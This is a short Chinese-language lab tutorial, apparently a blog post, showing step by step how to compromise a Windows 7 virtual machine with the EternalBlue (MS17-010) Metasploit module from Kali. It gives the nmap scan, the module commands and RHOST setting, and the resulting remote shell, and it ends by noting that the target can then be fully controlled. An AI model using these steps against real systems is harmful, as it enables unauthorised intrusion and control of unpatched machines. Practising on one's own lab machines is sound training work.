两台Vmware虚拟机:
Kali
Win7 64位:
(主机)kali的ip是 192.168.0.119
(靶机)win7的ip是192.168.0.109
使用nmap端口扫描工具,扫描一下目标靶机;如下图,可以发现:目标win7系统的445端口开启,可以使用永恒之蓝漏洞攻击
Kali终端输入msfconsole,启动msfconsole;如下图,启动画面每次都不一样 图像不一样不用担心
先查找一下永恒之蓝的攻击模块: 使用命令 search eternalblue
使用该攻击模块:
命令:use exploit/windows/smb/ms17_010_eternalblue ,
使用这个模块,我们show targets看一下这个模块适用于哪些系统的主机
查看一下攻击配置show options
可以看到,win7和server 2008 r2都适用
设置要攻击的靶机IP地址:set RHOST 192.168.0.109
接着run执行攻击
程序就会运行,当看到WIN的时候,说明我们已经渗透进win7里面去了,按下回车出现了win7的cmd,这是已经是渗透成功了。但有时候不一定会成功,会返回FAIL,说明这个系统打了补丁,这个漏洞已经没有威力了。
攻击成功!!! 成功进入到靶机的cmd管理界面
但是,此时界面为乱码,我们解决一下编码的问题:在靶机的命令行界面:执行命令 chcp 65001 切换编码字符,然后执行命令 显示正常。
此时,我们已经渗透进靶机的cmd操作界面,可以对靶机为所欲为(重启 删文件 创建文件 执行exe 创建用户等等)了。